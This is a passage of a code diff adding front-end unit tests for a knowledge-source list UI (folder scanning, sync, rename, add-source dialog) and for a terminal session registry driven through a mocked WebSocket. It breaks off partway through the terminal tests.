+    fileInfo('/tmp/notes/alpha.md', 'done', { item_count: 7 }),
+    fileInfo('/tmp/notes/bravo.md', 'scanning'),
+    fileInfo('/tmp/notes/charlie.md', 'failed', { error_message: 'unreadable' }),
+    fileInfo('/tmp/notes/delta.md', 'pending'),
+  ]
+
+  const routeScan = (resp: SourceFilesResponse) => {
+    handler = (path: string) => {
+      if (path === '/sources') return [folder()]
+      if (path === '/sources/f1/files') return resp
+      return { ok: true }
+    }
+  }
+
+  async function expandFolder() {
+    const utils = renderList()
+    await screen.findByText('Notes folder')
+    fireEvent.click(screen.getByLabelText('Expand folder details'))
+    return utils
+  }
+
+  it('shows scan progress, the file in flight, recent successes and failures', async () => {
+    routeScan(filesResp({ total: 4, done: 1, failed: 1, files: scanFiles }))
+    await expandFolder()
+
+    expect(await screen.findByText('1/4 (25%)')).toBeTruthy()
+    expect(screen.getByText('1 failed')).toBeTruthy()
+    // Basenames only: the full path is noise once the folder is named above.
+    expect(screen.getByText('bravo.md')).toBeTruthy()
+    expect(screen.getByText('alpha.md')).toBeTruthy()
+    expect(screen.getByText('7 items')).toBeTruthy()
+    expect(screen.getByText('charlie.md')).toBeTruthy()
+    // The failure reason must be visible, not only in a tooltip.
+    expect(screen.getByText('unreadable')).toBeTruthy()
+    // A pending file is not yet news.
+    expect(screen.queryByText('delta.md')).toBeNull()
+  })
+
+  it('retries and skips an individual failed file', async () => {
+    routeScan(filesResp({ total: 4, done: 1, failed: 1, files: scanFiles }))
+    await expandFolder()
+    await screen.findByText('charlie.md')
+
+    fireEvent.click(screen.getByText('Retry'))
+    await waitFor(() => expect(callsTo('/sources/f1/files/retry', 'POST')).toHaveLength(1))
+    expect(JSON.parse((callsTo('/sources/f1/files/retry')[0][1] as RequestInit).body as string))
+      .toEqual({ file_path: '/tmp/notes/charlie.md' })
+
+    fireEvent.click(screen.getByText('Skip'))
+    await waitFor(() => expect(callsTo('/sources/f1/files/skip', 'POST')).toHaveLength(1))
+    expect(JSON.parse((callsTo('/sources/f1/files/skip')[0][1] as RequestInit).body as string))
+      .toEqual({ file_path: '/tmp/notes/charlie.md' })
+  })
+
+  it('collapses the panel again', async () => {
+    routeScan(filesResp({ total: 4, done: 1, failed: 1, files: scanFiles }))
+    await expandFolder()
+    await screen.findByText('1/4 (25%)')
+
+    fireEvent.click(screen.getByLabelText('Collapse folder details'))
+    expect(screen.queryByText('1/4 (25%)')).toBeNull()
+    expect(screen.getByLabelText('Expand folder details')).toBeTruthy()
+  })
+
+  it('renders nothing for a folder the gateway has no files for', async () => {
+    routeScan(filesResp())
+    await expandFolder()
+    // No progress figure at all — a bare 0/0 bar would imply work is queued.
+    await waitFor(() => expect(callsTo('/sources/f1/files')).not.toHaveLength(0))
+    expect(screen.queryByText(/\(\d+%\)/)).toBeNull()
+  })
+
+  it('refreshes the item and graph views once a scan completes', async () => {
+    // The list and graph tabs are rendered from separate queries, so a finished
+    // scan is invisible there until it invalidates them.
+    routeScan(filesResp({ total: 4, done: 1, files: scanFiles }))
+    const { queryClient } = await expandFolder()
+    await screen.findByText('1/4 (25%)')
+
+    const invalidated = vi.spyOn(queryClient, 'invalidateQueries')
+    act(() => {
+      queryClient.setQueryData(['source-files', 'f1'], filesResp({
+        total: 4, done: 4, files: scanFiles.map(f => ({ ...f, status: 'done' as const })),
+      }))
+    })
+
+    await screen.findByText('4/4 (100%)')
+    const keys = invalidated.mock.calls.map(c => JSON.stringify((c[0] as { queryKey: unknown }).queryKey))
+    expect(keys).toContain('["knowledge-items"]')
+    expect(keys).toContain('["knowledge-graph"]')
+    expect(keys).toContain('["knowledge-stats"]')
+    invalidated.mockRestore()
+  })
+})
+
+describe('SourcesList — row actions', () => {
+  it('syncs a manual source and disables the button while in flight', async () => {
+    let releaseSync: (v: unknown) => void = () => {}
+    handler = (path: string, opts?: RequestInit) => {
+      if (path === '/sources') return [src()]
+      if (path === '/sources/s1/sync' && opts?.method === 'POST') {
+        return new Promise(res => { releaseSync = res })
+      }
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('doc.md')
+
+    const button = screen.getByLabelText('Sync source')
+    fireEvent.click(button)
+    await waitFor(() => expect(screen.getByLabelText('Sync source')).toHaveProperty('disabled', true))
+
+    releaseSync({ synced: true })
+    await waitFor(() => expect(screen.getByLabelText('Sync source')).toHaveProperty('disabled', false))
+    expect(callsTo('/sources/s1/sync', 'POST')).toHaveLength(1)
+  })
+
+  it('offers Pause on a watching folder and Resume on a paused one', async () => {
+    handler = (path: string) => {
+      if (path === '/sources') return [
+        folder({ id: 'f1', name: 'Watching', sync_status: 'active' }),
+        folder({ id: 'f2', name: 'Halted', sync_status: 'paused' }),
+      ]
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('Watching')
+
+    expect(screen.getByTitle('Watching folder')).toBeTruthy()
+    expect(screen.getByTitle('Paused')).toBeTruthy()
+
+    fireEvent.click(screen.getByLabelText('Pause scan'))
+    await waitFor(() => expect(callsTo('/sources/f1/pause', 'POST')).toHaveLength(1))
+
+    fireEvent.click(screen.getByLabelText('Resume scan'))
+    await waitFor(() => expect(callsTo('/sources/f2/resume', 'POST')).toHaveLength(1))
+  })
+
+  it('confirms a folder that is still awaiting confirmation', async () => {
+    handler = (path: string) => {
+      if (path === '/sources') return [folder({ sync_status: 'pending_confirmation' })]
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('Notes folder')
+
+    // A folder that has not been confirmed must not offer Pause: there is nothing
+    // running to pause yet.
+    expect(screen.queryByLabelText('Pause scan')).toBeNull()
+    expect(screen.getByTitle('Awaiting confirmation')).toBeTruthy()
+
+    fireEvent.click(screen.getByLabelText('Confirm scan'))
+    await waitFor(() => expect(callsTo('/sources/f1/confirm', 'POST')).toHaveLength(1))
+  })
+
+  it('puts the row back when the delete fails', async () => {
+    confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
+    handler = (path: string, opts?: RequestInit) => {
+      if (path === '/sources') return [src()]
+      if (path === '/sources/s1' && opts?.method === 'DELETE') throw new Error('gateway said no')
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('doc.md')
+
+    fireEvent.click(screen.getByLabelText('Remove source'))
+    // The optimistic removal must be rolled back, or the source silently vanishes
+    // from the UI while still being indexed.
+    expect(await screen.findByText('doc.md')).toBeTruthy()
+  })
+
+  it('does not delete when the user declines the prompt', async () => {
+    confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(false)
+    handler = (path: string) => {
+      if (path === '/sources') return [src()]
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('doc.md')
+
+    fireEvent.click(screen.getByLabelText('Remove source'))
+    expect(callsTo('/sources/s1', 'DELETE')).toHaveLength(0)
+    expect(screen.getByText('doc.md')).toBeTruthy()
+  })
+
+  it('abandons a rename without a PATCH when the cancel control is used', async () => {
+    handler = (path: string) => {
+      if (path === '/sources') return [src({ name: 'Before' })]
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('Before')
+
+    fireEvent.click(screen.getByLabelText('Rename source'))
+    fireEvent.change(screen.getByLabelText('Source name'), { target: { value: 'After' } })
+    fireEvent.click(screen.getByLabelText('Cancel rename'))
+
+    expect(screen.queryByLabelText('Source name')).toBeNull()
+    expect(screen.getByText('Before')).toBeTruthy()
+    expect(callsTo('/sources/s1', 'PATCH')).toHaveLength(0)
+  })
+
+  it('refreshes the dependent views when a sync finishes', async () => {
+    handler = (path: string) => {
+      if (path === '/sources') return [src({ sync_status: 'syncing' })]
+      return { ok: true }
+    }
+    const { queryClient } = renderList()
+    await screen.findByText('doc.md')
+
+    const invalidated = vi.spyOn(queryClient, 'invalidateQueries')
+    act(() => {
+      queryClient.setQueryData(['knowledge-sources'], [src({ sync_status: 'synced' })])
+    })
+
+    await waitFor(() => {
+      const keys = invalidated.mock.calls.map(c => JSON.stringify((c[0] as { queryKey: unknown }).queryKey))
+      expect(keys).toContain('["knowledge-items"]')
+      expect(keys).toContain('["knowledge-graph"]')
+      expect(keys).toContain('["knowledge-stats"]')
+    })
+    invalidated.mockRestore()
+  })
+})
+
+describe('SourcesList — row metadata', () => {
+  it('flags a source that has not synced in over a month and leaves a fresh one plain', async () => {
+    const daysAgo = (n: number) => new Date(Date.now() - n * 86_400_000).toISOString()
+    handler = (path: string) => {
+      if (path === '/sources') return [
+        src({ id: 's1', name: 'Fresh', last_synced: daysAgo(2) }),
+        src({ id: 's2', name: 'Stale', last_synced: daysAgo(200) }),
+        src({ id: 's3', name: 'Untouched' }),
+      ]
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('Fresh')
+
+    const fresh = screen.getByText('2d ago')
+    expect(fresh.className).toContain('text-muted')
+    expect(fresh.className).not.toContain('text-warn')
+
+    const stale = screen.getByText(/6mo ago/)
+    expect(stale.className).toContain('text-warn')
+
+    expect(screen.getByText('never synced')).toBeTruthy()
+  })
+
+  it('renders a word count and abbreviates a large one', async () => {
+    handler = (path: string) => {
+      if (path === '/sources') return [
+        src({ id: 's1', name: 'Short', properties: JSON.stringify({ word_count: 500 }) }),
+        src({ id: 's2', name: 'Long', properties: JSON.stringify({ word_count: 2500 }) }),
+        src({ id: 's3', name: 'Unknown', properties: JSON.stringify({}) }),
+      ]
+      return { ok: true }
+    }
+    renderList()
+    await screen.findByText('Short')
+
+    expect(screen.getByText('500 words')).toBeTruthy()
+    expect(screen.getByText('~3k words')).toBeTruthy()
+    expect(screen.getAllByText(/words/)).toHaveLength(2)
+  })
+
+  it('shows a summary topic even when the stored themes are unreadable', async () => {
+    // summary_themes is opaque JSON from the gateway; a truncated write must not
+    // take the whole row down with it.
+    handler = (path: string) => {
+      if (path === '/sources') return [src({ summary_topic: 'Release notes', summary_themes: '{not json' })]
+      return { ok: true }
+    }
+    renderList()
+    expect(await screen.findByText('Release notes')).toBeTruthy()
+  })
+})
+
+describe('SourcesList — add-source dialog, file branch', () => {
+  async function openAddDialog(props: Partial<ListProps> = {}) {
+    handler = (path: string) => {
+      if (path === '/sources') return []
+      return { ok: true }
+    }
+    const utils = renderList(props)
+    fireEvent.click(await screen.findByText('+ Add Source'))
+    return utils
+  }
+
+  const dropZone = () =>
+    screen.getByText('Drop files here or click to upload').closest('[role="button"]') as HTMLElement
+
+  it('highlights the drop zone while a drag is over it and clears the highlight on leave', async () => {
+    await openAddDialog()
+    const zone = dropZone()
+    expect(zone.className).not.toContain('border-accent')
+
+    fireEvent.dragOver(zone)
+    expect(zone.className).toContain('border-accent')
+
+    fireEvent.dragLeave(zone)
+    expect(zone.className).not.toContain('border-accent')
+  })
+
+  it('ingests dropped files and closes the dialog', async () => {
+    const { onIngest } = await openAddDialog()
+    const file = new File(['# notes'], 'dropped.md', { type: 'text/markdown' })
+
+    fireEvent.drop(dropZone(), { dataTransfer: { files: [file] } })
+
+    expect(onIngest).toHaveBeenCalledTimes(1)
+    expect(onIngest.mock.calls[0][0]).toEqual([file])
+    expect(screen.queryByText('Drop files here or click to upload')).toBeNull()
+  })
+
+  it('ingests files chosen through the picker', async () => {
+    const { onIngest } = await openAddDialog()
+    const file = new File(['x'], 'picked.txt', { type: 'text/plain' })
+
+    fireEvent.change(screen.getByLabelText('Upload files'), { target: { files: [file] } })
+
+    expect(onIngest).toHaveBeenCalledTimes(1)
+    expect(onIngest.mock.calls[0][0]).toEqual([file])
+  })
+
+  it('honours a caller-supplied accept list and the extensionless-file note', async () => {
+    await openAddDialog({ uploadAccept: '.md,.txt', acceptsNoExtension: true })
+
+    expect(screen.getByLabelText('Upload files').getAttribute('accept')).toBe('.md,.txt')
+    expect(screen.getByText(/Files with no extension/)).toBeTruthy()
+  })
+
+  it('reports per-file ingestion progress for done, failed and in-flight jobs', async () => {
+    await openAddDialog({
+      ingestionJobs: [
+        { name: 'alpha.md', status: 'done' },
+        { name: 'bravo.md', status: 'error: too large' },
+        { name: 'charlie.md', status: 'chunking' },
+      ],
+    })
+
+    expect(screen.getByText('alpha.md')).toBeTruthy()
+    expect(screen.getByText('done')).toBeTruthy()
+    expect(screen.getByText('error: too large')).toBeTruthy()
+    expect(screen.getByText('chunking')).toBeTruthy()
+  })
+
+  it('reports a typed namespace up to the caller', async () => {
+    const { setUploadNamespace } = await openAddDialog({
+      namespaces: [{ name: 'legacy-default', count: 4 }],
+    })
+
+    fireEvent.change(screen.getByLabelText('Namespace'), { target: { value: 'research' } })
+
+    expect(setUploadNamespace).toHaveBeenCalledWith('research')
+    // The datalist is what makes an existing namespace reusable without typing it
+    // exactly, so its options must carry the item counts.
+    expect(screen.getByRole('option', { hidden: true }).textContent).toBe('legacy-default (4)')
+  })
+})
+
+describe('SourcesList — add-source dialog, folder branch', () => {
+  async function openFolderForm(opts: { folderPicker?: boolean; extra?: Handler } = {}) {
+    handler = (path: string, init?: RequestInit) => {
+      if (path === '/sources' && init?.method !== 'POST') return []
+      if (path === '/config') return { enabled: true, supported_formats: [], folder_picker: opts.folderPicker ?? false }
+      return opts.extra?.(path, init) ?? { ok: true }
+    }
+    const utils = renderList()
+    fireEvent.click(await screen.findByText('+ Add Source'))
+    fireEvent.click(screen.getByText('Local Folder'))
+    return utils
+  }
+
+  it('hides the folder picker when the gateway cannot open one', async () => {
+    await openFolderForm({ folderPicker: false })
+    expect(screen.queryByLabelText('Browse for a folder')).toBeNull()
+  })
+
+  it('fills the path from the native folder picker and shows it opening', async () => {
+    let releasePick: (v: unknown) => void = () => {}
+    await openFolderForm({
+      folderPicker: true,
+      extra: (path, init) => {
+        if (path === '/pick-folder' && init?.method === 'POST') {
+          return new Promise(res => { releasePick = res })
+        }
+        return { ok: true }
+      },
+    })
+
+    fireEvent.click(await screen.findByLabelText('Browse for a folder'))
+    expect(await screen.findByText('Opening...')).toBeTruthy()
+
+    releasePick({ path: '/home/user/notes' })
+    await waitFor(() =>
+      expect(screen.getByLabelText('Folder path')).toHaveProperty('value', '/home/user/notes'))
+  })
+
+  it('leaves the path alone when the picker is dismissed', async () => {
+    await openFolderForm({
+      folderPicker: true,
+      extra: (path) => (path === '/pick-folder' ? { path: null } : { ok: true }),
+    })
+
+    fireEvent.click(await screen.findByLabelText('Browse for a folder'))
+    await waitFor(() => expect(callsTo('/pick-folder', 'POST')).toHaveLength(1))
+    expect(screen.getByLabelText('Folder path')).toHaveProperty('value', '')
+  })
+
+  it('sends the name, ignore patterns and recursive flag the user set', async () => {
+    await openFolderForm()
+
+    fireEvent.change(screen.getByLabelText('Source name (optional)'), { target: { value: 'Team notes' } })
+    fireEvent.change(screen.getByLabelText('Folder path'), { target: { value: '/tmp/docs' } })
+    fireEvent.change(screen.getByLabelText('Ignore patterns'), {
+      target: { value: '.trash/*\n\n  Templates/*  \n' },
+    })
+    fireEvent.click(screen.getByLabelText('Include subdirectories (recursive)'))
+
+    fireEvent.click(screen.getByText('Add Folder'))
+    await waitFor(() => expect(callsTo('/sources', 'POST')).toHaveLength(1))
+
+    const body = JSON.parse((callsTo('/sources', 'POST')[0][1] as RequestInit).body as string)
+    expect(body.name).toBe('Team notes')
+    expect(body.source_type).toBe('local_folder')
+    expect(body.uri).toBe('/tmp/docs')
+    // Blank lines and stray padding are the normal shape of a pasted list; they
+    // must not become patterns that match nothing.
+    expect(body.properties.ignore_patterns).toEqual(['.trash/*', 'Templates/*'])
+    expect(body.properties.recursive).toBe(false)
+  })
+
+  it('omits ignore_patterns entirely when the box is left blank', async () => {
+    await openFolderForm()
+    fireEvent.change(screen.getByLabelText('Folder path'), { target: { value: '/tmp/docs' } })
+    fireEvent.click(screen.getByText('Add Folder'))
+
+    await waitFor(() => expect(callsTo('/sources', 'POST')).toHaveLength(1))
+    const body = JSON.parse((callsTo('/sources', 'POST')[0][1] as RequestInit).body as string)
+    expect(body.properties).not.toHaveProperty('ignore_patterns')
+    // Falls back to the path when no display name was given.
+    expect(body.name).toBe('/tmp/docs')
+  })
+
+  it('cannot be submitted with an empty path', async () => {
+    await openFolderForm()
+    expect(screen.getByText('Add Folder')).toHaveProperty('disabled', true)
+  })
+
+  it('surfaces the gateway error message when the add fails', async () => {
+    await openFolderForm({
+      extra: (path, init) => {
+        if (path === '/sources' && init?.method === 'POST') throw new Error('path is not a directory')
+        return { ok: true }
+      },
+    })
+    fireEvent.change(screen.getByLabelText('Folder path'), { target: { value: '/tmp/nope' } })
+    fireEvent.click(screen.getByText('Add Folder'))
+
+    expect(await screen.findByText('path is not a directory')).toBeTruthy()
+  })
+
+  it('closes the dialog on cancel', async () => {
+    await openFolderForm()
+    fireEvent.click(screen.getByText('Cancel'))
+    expect(screen.queryByLabelText('Folder path')).toBeNull()
+  })
+
+  it('syncs the new source straight away when no confirmation is needed', async () => {
+    await openFolderForm({
+      extra: (path, init) => {
+        if (path === '/sources' && init?.method === 'POST') return { id: 'new-1', status: 'active' }
+        return { ok: true }
+      },
+    })
+    fireEvent.change(screen.getByLabelText('Folder path'), { target: { value: '/tmp/docs' } })
+    fireEvent.click(screen.getByText('Add Folder'))
+
+    await waitFor(() => expect(callsTo('/sources/new-1/sync', 'POST')).toHaveLength(1))
+    expect(screen.queryByLabelText('Folder path')).toBeNull()
+  })
+})
+
+describe('SourcesList — pending folder confirmation', () => {
+  async function addFolderExpectingConfirmation(fileCount: number, confirmImpl?: Handler) {
+    handler = (path: string, init?: RequestInit) => {
+      if (path === '/sources' && init?.method === 'POST') {
+        return { id: 'p1', status: 'pending_confirmation', file_count: fileCount }
+      }
+      if (path === '/sources') return []
+      if (path === '/config') return { enabled: true, supported_formats: [], folder_picker: false }
+      return confirmImpl?.(path, init) ?? { ok: true }
+    }
+    const utils = renderList()
+    fireEvent.click(await screen.findByText('+ Add Source'))
+    fireEvent.click(screen.getByText('Local Folder'))
+    fireEvent.change(screen.getByLabelText('Folder path'), { target: { value: '/tmp/huge' } })
+    fireEvent.click(screen.getByText('Add Folder'))
+    return utils
+  }
+
+  it('warns before a large scan and starts it on confirmation', async () => {
+    await addFolderExpectingConfirmation(150)
+
+    expect(await screen.findByText(/150 supported files found/)).toBeTruthy()
+    expect(screen.getByText(/Scanning this many files/)).toBeTruthy()
+
+    fireEvent.click(screen.getByText('Start Scanning'))
+    await waitFor(() => expect(callsTo('/sources/p1/confirm', 'POST')).toHaveLength(1))
+    await waitFor(() => expect(screen.queryByText('Start Scanning')).toBeNull())
+  })
+
+  it('does not warn for a small folder', async () => {
+    await addFolderExpectingConfirmation(4)
+
+    expect(await screen.findByText(/4 supported files found/)).toBeTruthy()
+    expect(screen.queryByText(/Scanning this many files/)).toBeNull()
+    expect(screen.getByText(/watched continuously/)).toBeTruthy()
+  })
+
+  it('still offers to watch a folder that has nothing in it yet', async () => {
+    await addFolderExpectingConfirmation(0)
+
+    expect(await screen.findByText(/empty \(0 supported files\)/)).toBeTruthy()
+    // Watching an empty folder is a legitimate choice — files arrive later.
+    expect(screen.getByText('Watch Anyway')).toBeTruthy()
+    expect(screen.getByText(/Any supported files added here/)).toBeTruthy()
+  })
+
+  it('shows the in-flight state while the scan is starting', async () => {
+    let releaseConfirm: (v: unknown) => void = () => {}
+    await addFolderExpectingConfirmation(10, (path, init) => {
+      if (path === '/sources/p1/confirm' && init?.method === 'POST') {
+        return new Promise(res => { releaseConfirm = res })
+      }
+      return { ok: true }
+    })
+
+    fireEvent.click(await screen.findByText('Start Scanning'))
+    expect(await screen.findByText('Starting...')).toBeTruthy()
+
+    releaseConfirm({ ok: true })
+    await waitFor(() => expect(screen.queryByText('Starting...')).toBeNull())
+  })
+
+  it('deletes the unconfirmed source when the user backs out', async () => {
+    await addFolderExpectingConfirmation(150)
+    await screen.findByText('Start Scanning')
+
+    // Cancelling must not leave a half-registered source behind that a later
+    // sweep would pick up anyway.
+    fireEvent.click(screen.getByText('Cancel'))
+    await waitFor(() => expect(callsTo('/sources/p1', 'DELETE')).toHaveLength(1))
+    expect(screen.queryByText('Start Scanning')).toBeNull()
+  })
+})

--- a/website/src/test/TerminalRegistryCoverage.test.tsx
+++ b/website/src/test/TerminalRegistryCoverage.test.tsx
@@ -1,0 +1,541 @@
+/**
+ * Behavioural coverage for the terminal session registry.
+ *
+ * `terminalRegistry` is module-scope state (the sockets, titles, cwds and
+ * persistent connection managers all live outside React so a terminal tab can
+ * unmount without dropping its PTY). The existing terminal specs mock this
+ * module wholesale, so almost nothing below the enabled-flag block was
+ * exercised. This file drives the real module: the registry/ready-listener
+ * handshake, the send helpers, the two `useSyncExternalStore` hooks, and the
+ * whole `connect` lifecycle (open/message/close/error, exponential backoff and
+ * the retry ceiling) through a WebSocket double.
+ *
+ * Harness note: because the state is module-scope and shared across tests,
+ * every test uses its own session id and `afterEach` disposes the ids it
+ * created — otherwise a leftover reconnect timer from one test would create a
+ * socket during the next one.
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { renderHook, act } from '@testing-library/react'
+import type { Terminal } from '@xterm/xterm'
+import type { FitAddon } from '@xterm/addon-fit'
+import {
+  setTerminalEnabledFlag,
+  isTerminalEnabled,
+  useTerminalEnabled,
+  useTerminalTitle,
+  getTerminalCwd,
+  registerTerminalWs,
+  unregisterTerminalWs,
+  getTerminalWs,
+  onTerminalReady,
+  sendToTerminalSession,
+  sendRawToTerminalSession,
+  ensureTerminalConnection,
+  disposeTerminalConnection,
+} from '../utils/terminalRegistry'
+
+const WS_INSTANCES: MockWebSocket[] = []
+
+class MockWebSocket {
+  static CONNECTING = 0
+  static OPEN = 1
+  static CLOSING = 2
+  static CLOSED = 3
+  readyState: number = MockWebSocket.CONNECTING
+  binaryType = 'blob'
+  onopen: ((ev: Event) => void) | null = null
+  onmessage: ((ev: MessageEvent) => void) | null = null
+  onclose: ((ev: CloseEvent) => void) | null = null
+  onerror: ((ev: Event) => void) | null = null
+  send = vi.fn<(data: string | ArrayBufferLike | Uint8Array) => void>()
+  close = vi.fn(() => { this.readyState = MockWebSocket.CLOSED })
+
+  constructor(public url: string) { WS_INSTANCES.push(this) }
+
+  simulateOpen() {
+    this.readyState = MockWebSocket.OPEN
+    this.onopen?.(new Event('open'))
+  }
+
+  /** A real socket fires onclose AFTER transitioning; mirror that order. */
+  simulateClose() {
+    this.readyState = MockWebSocket.CLOSED
+    this.onclose?.(new CloseEvent('close'))
+  }
+
+  simulateError() { this.onerror?.(new Event('error')) }
+
+  simulateBinary(bytes: Uint8Array) {
+    const buf = new ArrayBuffer(bytes.length)
+    new Uint8Array(buf).set(bytes)
+    this.onmessage?.(new MessageEvent('message', { data: buf }))
+  }
+
+  simulateText(raw: string) {
+    this.onmessage?.(new MessageEvent('message', { data: raw }))
+  }
+
+  simulateJson(payload: unknown) { this.simulateText(JSON.stringify(payload)) }
+}
+
+/** Minimal xterm double: the registry only reads reset/write/cols/rows/element
+ *  and registers one onData + one onResize listener per connection. */
+class FakeTerm {
+  reset = vi.fn()
+  write = vi.fn<(data: Uint8Array) => void>()
+  cols = 80
+  rows = 24
+  element: { offsetParent: unknown } | undefined = undefined
+  dataCb: ((data: string) => void) | undefined
+  resizeCb: ((size: { cols: number; rows: number }) => void) | undefined
+  onData = (cb: (data: string) => void) => { this.dataCb = cb }
+  onResize = (cb: (size: { cols: number; rows: number }) => void) => { this.resizeCb = cb }
+
+  /** Pretend the tab is laid out, so the open handler takes the fit branch. */
+  layOut() { this.element = { offsetParent: {} } }
+  asTerminal() { return this as unknown as Terminal }
+}
+
+class FakeFit {
+  fit = vi.fn()
+  asFitAddon() { return this as unknown as FitAddon }
+}
+
+const decode = (ws: MockWebSocket, call = 0) => {
+  const arg = ws.send.mock.calls[call][0]
+  return typeof arg === 'string' ? arg : new TextDecoder().decode(arg as Uint8Array)
+}
+
+/** Sockets registered by hand (no Conn behind them) still need clearing. */
+const OWNED: string[] = []
+function session(name: string): string {
+  const id = `term-${name}`
+  OWNED.push(id)
+  return id
+}
+
+/** An open socket wired straight into the registry, no connection manager. */
+function openSocket(sessionId: string): MockWebSocket {
+  const ws = new MockWebSocket(`ws://localhost/api/ws/terminal/${sessionId}`)
+  ws.readyState = MockWebSocket.OPEN
+  registerTerminalWs(sessionId, ws as unknown as WebSocket)
+  return ws
+}
+
+describe('terminalRegistry', () => {
+  beforeEach(() => {
+    WS_INSTANCES.length = 0
+    OWNED.length = 0
+    vi.stubGlobal('WebSocket', MockWebSocket)
+    // Backoff adds up to 20% jitter; pin it so delays are exact.
+    vi.spyOn(Math, 'random').mockReturnValue(0)
+  })
+
+  afterEach(() => {
+    for (const id of OWNED) {
+      disposeTerminalConnection(id)
+      unregisterTerminalWs(id)
+    }
+    setTerminalEnabledFlag(false)
+    vi.useRealTimers()
+    vi.unstubAllGlobals()
+    vi.restoreAllMocks()
+  })
+
+  describe('enabled flag', () => {
+    it('publishes the flag through the hook and stops on unmount', () => {
+      const { result, unmount, rerender } = renderHook(() => useTerminalEnabled())
+      expect(result.current).toBe(false)
+
+      act(() => { setTerminalEnabledFlag(true) })
+      rerender()
+      expect(result.current).toBe(true)
+      expect(isTerminalEnabled()).toBe(true)
+
+      unmount()
+      // No listener left to notify — the imperative read still reflects it.
+      act(() => { setTerminalEnabledFlag(false) })
+      expect(isTerminalEnabled()).toBe(false)
+    })
+  })
+
+  describe('socket registry', () => {
+    it('hands back only a socket that is actually open', () => {
+      const id = session('open-check')
+      const ws = openSocket(id)
+      expect(getTerminalWs(id)).toBe(ws as unknown as WebSocket)
+
+      ws.readyState = MockWebSocket.CLOSING
+      expect(getTerminalWs(id)).toBeNull()
+    })
+
+    it('returns null for a session that was never registered', () => {
+      expect(getTerminalWs(session('never'))).toBeNull()
+    })
+
+    it('forgets a session on unregister', () => {
+      const id = session('unregister')
+      openSocket(id)
+      unregisterTerminalWs(id)
+      expect(getTerminalWs(id)).toBeNull()
+    })
+  })
+
+  describe('onTerminalReady', () => {
+    it('runs the callback immediately when the socket is already open', () => {
+      const id = session('ready-now')
+      openSocket(id)
+      const cb = vi.fn()
+      const off = onTerminalReady(id, cb)
+      expect(cb).toHaveBeenCalledTimes(1)
+      // The unsubscribe for the already-fired case is a no-op, not a throw.
+      expect(() => off()).not.toThrow()
+    })
+
+    it('defers every waiter until the socket registers, then drains once', () => {
+      const id = session('ready-later')
+      const first = vi.fn()
+      const second = vi.fn()
+      onTerminalReady(id, first)
+      onTerminalReady(id, second)
+      expect(first).not.toHaveBeenCalled()
+
+      openSocket(id)
+      expect(first).toHaveBeenCalledTimes(1)
+      expect(second).toHaveBeenCalledTimes(1)
+
+      // The waiter set is dropped on drain, so a later socket does not re-fire.
+      openSocket(id)
+      expect(first).toHaveBeenCalledTimes(1)
+    })
+
+    it('does not run a waiter that unsubscribed before the socket opened', () => {
+      const id = session('ready-cancel')
+      const cb = vi.fn()
+      onTerminalReady(id, cb)()
+      openSocket(id)
+      expect(cb).not.toHaveBeenCalled()
+    })
+  })
+
+  describe('send helpers', () => {
+    it('sends a trimmed line with one trailing newline', () => {
+      const id = session('send-line')
+      const ws = openSocket(id)
+      expect(sendToTerminalSession(id, 'echo hi   \n\n')).toBe(true)
+      expect(decode(ws)).toBe('echo hi\n')
+    })
+
+    it('sends raw data without appending a newline', () => {
+      const id = session('send-raw')
+      const ws = openSocket(id)
+      expect(sendRawToTerminalSession(id, '/tmp/pa')).toBe(true)
+      expect(decode(ws)).toBe('/tmp/pa')
+    })
+
+    it('reports failure when the session has no open socket', () => {
+      const id = session('send-closed')
+      expect(sendToTerminalSession(id, 'ls')).toBe(false)
+      expect(sendRawToTerminalSession(id, 'ls')).toBe(false)
+    })
+
+    it('reports failure when the socket throws on send', () => {
+      const id = session('send-throws')
+      const ws = openSocket(id)
+      ws.send.mockImplementation(() => { throw new Error('socket gone') })
+      expect(sendToTerminalSession(id, 'ls')).toBe(false)
+      expect(sendRawToTerminalSession(id, 'ls')).toBe(false)
+    })
+  })
+
+  describe('useTerminalTitle', () => {
+    it('starts undefined and follows the backend title frames', () => {
+      const id = session('title')
+      const term = new FakeTerm()
+      ensureTerminalConnection(id, term.asTerminal(), new FakeFit().asFitAddon())
+      const ws = WS_INSTANCES[0]
+
+      let renders = 0
+      const { result, rerender } = renderHook(() => {
+        renders += 1
+        return useTerminalTitle(id)
+      })
+      expect(result.current).toBeUndefined()
+
+      act(() => { ws.simulateJson({ type: 'title', text: 'npm run dev' }) })
+      rerender()
+      expect(result.current).toBe('npm run dev')
+
+      const afterFirst = renders
+      // Same title again: setSessionTitle short-circuits, so no notification.
+      act(() => { ws.simulateJson({ type: 'title', text: 'npm run dev' }) })
+      expect(renders).toBe(afterFirst)
+    })
+
+    it('ignores title frames without string text', () => {
+      const id = session('title-shape')
+      const term = new FakeTerm()
+      ensureTerminalConnection(id, term.asTerminal(), new FakeFit().asFitAddon())
+      const ws = WS_INSTANCES[0]
+
+      const { result, rerender } = renderHook(() => useTerminalTitle(id))
+      act(() => { ws.simulateJson({ type: 'title', text: 42 }) })
+      rerender()
+      expect(result.current).toBeUndefined()
+    })
+
+    it('tracks separate sessions independently', () => {
+      const a = session('title-a')
+      const b = session('title-b')
+      ensureTerminalConnection(a, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+      ensureTerminalConnection(b, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+      const [wsA, wsB] = WS_INSTANCES
+
+      const hookA = renderHook(() => useTerminalTitle(a))
+      const hookB = renderHook(() => useTerminalTitle(b))
+      act(() => {
+        wsA.simulateJson({ type: 'title', text: 'build' })
+        wsB.simulateJson({ type: 'title', text: 'tests' })
+      })
+      hookA.rerender()
+      hookB.rerender()
+      expect(hookA.result.current).toBe('build')
+      expect(hookB.result.current).toBe('tests')
+    })
+  })
+
+  describe('cwd frames', () => {
+    it('records the live cwd and ignores frames with a non-string path', () => {
+      const id = session('cwd')
